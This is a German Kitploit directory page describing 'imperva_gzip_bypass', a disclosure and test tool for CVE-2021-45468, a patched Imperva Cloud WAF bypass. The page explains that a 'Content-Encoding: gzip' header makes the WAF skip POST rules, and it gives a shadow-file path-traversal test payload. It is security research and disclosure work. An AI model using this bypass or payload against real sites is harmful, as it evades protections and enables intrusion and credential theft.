Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Imperva_gzip_bypass — Exploit für CVE-2021-45468, ein Imperva-WAF-Bypass. | Kitploit
Tools/GitHubGitHub/0xhaggis/imperva_gzip_bypass
SchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationWAF-UmgehungPenetrationstests
GitHub0xhaggis/imperva_gzip_bypass

Imperva_gzip_bypass

Exploit für CVE-2021-45468, ein Imperva-WAF-Bypass.

Repository anzeigen
62vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Imperva Web Application Firewall (WAF) POST-Anfrage-Bypass

Imperva Cloud WAF war anfällig für einen Bypass, der es Angreifern ermöglicht, WAF-Regeln zu umgehen, wenn schädliche HTTP-POST-Payloads gesendet werden, wie z.B. Log4j-Exploits, SQL-Injection, Befehlseinschleusung, Directory Traversal, XXE usw.

Behebung

Das Imperva-Team nahm dies vom Zeitpunkt der Meldung an sehr ernst und setzte innerhalb weniger Tage eine globale Behebung um. Anerkennung dafür. Alle Kunden von Cloud WAF wurden automatisch ab dem 22. Dezember 2021 aktualisiert. Die Zusammenarbeit mit Imperva war großartig; das Unternehmen verfügt eindeutig über ein ausgereiftes, kompetentes und leistungsfähiges Sicherheitsteam.

Ausnutzung

Fügen Sie den Header Content-Encoding: gzip zu HTTP-POST-Anfragen hinzu. Lassen Sie die POST-Daten unverändert. Codieren Sie sie nicht. Solange die ersten vier Bytes des Content-Encoding-Headers gzip sind, werden keine WAF-Regeln auf POST-Anfragen angewendet.

Sie können dies in Burp mit der Funktion „Match & Replace“ des Proxys tun:

Fügen Sie einen neuen Header wie folgt hinzu:

Das war's; Sie können loslegen.

Ausführen des Testskripts

Führen Sie imperva_gzip.py gegen eine URL aus, die POST-Anfragen unterstützt, wie folgt:

Syntax: ./imperva_gzip.py [[-t] | [-r]] URL

Erraten des WAF-Typs für eine bestimmte URL:

root@kitploit:~
$ ./imperva_gzip.py -t https://www.vulnerable.com/search
Imperva Incapsula
$ ./imperva_gzip.py -t https://www.wordpress-user.com/login
WordFence
$ ./imperva_gzip.py -t https://www.cloudflare-customer.com
Cloudflare

Prüfen, ob die WAF anfällig für den gzip-Bypass ist:

root@kitploit:~
$ ./imperva_gzip.py https://www.vulnerable.com/search
[+] Können wir POST-Anfragen an https://www.vulnerable.com/search stellen?
[+] Prüfe auf Imperva WAF...
[+] Versuche gzip-Bypass für UNIX-Trigger...
[+] Anfällig! HTTP-Antwortcode: 200
[+] Versuche gzip-Bypass für Windows-Trigger...
[+] Anfällig! HTTP-Antwortcode: 200

Wenn Sie diesen Fehler erhalten:

root@kitploit:~
$ ./imperva_gzip.py https://www.vulnerable.com/search
[+] Können wir POST-Anfragen an https://www.vulnerable.com/search stellen?
[!] POST an https://www.vulnerable.com/search nicht möglich. Versuchen Sie -r, wenn 30x-Weiterleitungen erlaubt sind. HTTP-Antwortcode: 302

versuchen Sie, -r in der Befehlszeile zu übergeben, um den entspannten Modus zu aktivieren. Der entspannte Modus ist standardmäßig deaktiviert, was bedeutet, dass eine POST-Anfrage eine HTTP-200-Antwort vom Server erwarten soll. -r erweitert die akzeptablen Antworten auf HTTP 2xx, 3xx.

Skriptausführung

Die Exitcodes für imperva_gzip.py sind wie folgt:

root@kitploit:~
0: Zurückgegeben nach Ermittlung des WAF-Typs.
1: Befehlszeile ungültig.
2: Verbindungsfehler aufgetreten. Kann DNS-Fehler, Timeout usw. sein.
3: Keine WAF erkannt; schädliche UNIX/Windows-Payloads wurden nicht blockiert.
4: Eine WAF wurde erkannt, aber es war nicht Imperva.
5: Der Server antwortete auf eine Test-POST-Anfrage mit etwas anderem als HTTP 200.
128: Es gibt eine Imperva WAF, aber sie ist nicht anfällig für den gzip-Bypass.
129: Der Bypass war für die UNIX-Payload wirksam, aber nicht für die Windows-Payload.
130: Der Bypass war für die Windows-Payload wirksam, aber nicht für die UNIX-Payload.
131: Der Bypass war sowohl gegen Windows- als auch gegen UNIX-Payloads wirksam.

Manuelles Testen auf Anfälligkeit

Senden Sie drei POST-Anfragen:

  1. Erstellen Sie eine grundlegende POST-Anfrage/Antwort mit einer gültigen, aber harmlosen POST-Anfrage
  2. Lösen Sie die Imperva WAF mit derselben POST-Anfrage aus, jedoch mit zusätzlichen „bösartigen“ Daten wie &test=../../../../../../../etc/shadow im Body, um zu überprüfen, dass Imperva sie blockiert
  3. Fügen Sie den Header Content-Encoding: gzip zu derselben bösartigen Anfrage hinzu und überprüfen Sie, dass Imperva sie nicht blockiert

Andere Kodierungen

Laut https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding gibt es vier gültige Werte für den Content-Encoding-Header:

  • compress
  • deflate
  • gzip
  • br

In Tests funktionierte nur gzip als Bypass.

Betroffene Versionen

Imperva Cloud WAF

Cloud WAF wird von Imperva verwaltet. Daher betreffen Updates für Cloud WAF fast alle Kunden nahezu gleichzeitig. Es wurde für alle Kunden ab dem 22. Dezember 2021 aktualisiert.

SecureSphere

Der gzip-Bypass-Fehler wurde in einem separaten Imperva-Produkt namens SecureSphere behoben. Die Versionshinweise für v12.6 von SecureSphere enthalten diesen Absatz:

SPHR-58185: Wenn SecureSphere den POST-Body in Anfragen mit dem Header "Content-Encoding: gzip/deflate" nicht dekomprimieren konnte, wurde keine Warnung ausgegeben und die Anfrage durchgelassen.

Ich bin mir ziemlich sicher, dass dies derselbe Fehler ist, möglicherweise mit derselben Code-Herkunft wie Cloud WAF ... es ist ein ziemlich spezifischer Fehler, um in zwei Produkten aufzutreten. Das Problem wurde für SecureSphere im Februar 2021 behoben, aber wir wissen nicht, wann es eingeführt wurde. Es ist möglich, dass die Schwachstelle seit Jahren bestand!

Kontakt

Bishop Fox

  • Autor: @carllivitt @bishopfox
  • Offensive Security: Bishop Fox
  • Continuous Offensive Security: Bishop Fox Cosmos
  • Mad Scientists: Bishop Fox Labs

Imperva

Imperva Kundensupport: https://www.imperva.com/support/technical-support/

Referenzen

  • Imperva Cloud WAF
  • Versionshinweise zu Imperva SecureSphere 12.6
  • HTTP-Header Content-Encoding
Tool herunterladen